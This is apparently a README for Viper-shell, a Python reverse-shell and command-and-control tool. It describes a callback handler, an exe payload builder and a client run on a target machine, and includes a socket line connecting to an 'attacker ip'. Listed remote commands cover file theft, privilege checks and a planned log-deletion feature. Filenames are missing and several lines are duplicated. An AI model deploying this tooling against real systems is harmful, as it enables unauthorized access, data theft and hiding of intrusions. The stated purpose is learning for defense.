Viper-shell : Testing exploitation and enumeration
Viper is designed in order to retrieve compromised files, processes, and services in case you have to reach out and grab information quickly. The viper can also be used for testing exploitation and enumeration for the purpose of learning offensive for defensive actions.

Viper also has team server capabilities *I am still working out bugs but it works great currently with command line
This program was created as a basic function to reach out and grab things fast! Powered by twisted python.
I have recently added a twisted webserver and chat server for teamdevops
viper has been tested on kali 2.0 x86
Instalation instructions
The should install everything for you
The should install everything for you
Important note: You may want to take a virtual-image snapshot before running This should work perfectly though.
Install commands
navigate to vipers root directory
$>chmod +x
The installer will back up your ~/.bashrc file and This should do the tricks and get you up and running.
You will need to verify the installer adds the python path to the end of the ~/.bashrc
Quick pythonpath help commands. This should be done for you while doing instalation. I still have to confirm this again
libraries installed and current requirements check for mods
python-twisted +16.6;
Zope interface;
python 2.7;
to start the viper console:
to start the viper console:
$$> chmod +x
$$> ./
start the handler first and then start the client on the target machine
start the handler first and then start the client on the target machine
viper main commands:
[*] handler ========= > "starts the viper server and waits for a call back"
[*] buildfang ========= > "creates a basic exe file from and stores it inside payloads";
[*] chatserver ========= > will start your chat server on port 8123. You will have to open a new terminal to connect
[*] stopchat ========= > will tear down the chat server when needed
[*] startweb ========= > starts the webserver
[*] stopweb ========= > stops the webserver
build fang pre-instructions
Inside viper client modify these two lines with your local ip address
Inside viper client modify these two lines with your local ip address
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('address you want to connect back to, attacker ip', 8081))
viper connection commands:
use these once you get the call back from the client. first you will need to enter in the local host and port number that you assigned to the client before deploying.
use these once you get the call back from the client. first you will need to enter in the local host and port number that you assigned to the client before deploying.
[*] download ========= > downloads a file from the client machine (ex: download #source #dest);
[*] upload ========= > uploads a file to the client machine (ex: upload #source #dest);
[*] getenv ========= > prints the system information";
[*] getuid ========= > Get the user level access of the shell";
[*] SystemInfo ========= > Get Fingerprint of the system"; todo
[*] capture ========= > take images of the host machine "; todo
[*] Cover ========= > Delete all traces of logs"; todo
*important note: to upload or download source or dest must be full file paths with file names or program may currently break. #working on this.
Twisted Remote Desktop integration
For now there is a rdpclient located in /application/services/
For now there is a rdpclient located in /application/services/
./ -u username -p password
git clone && cd viper-shell
chmod +x *.sh
./ (for check dependencies)
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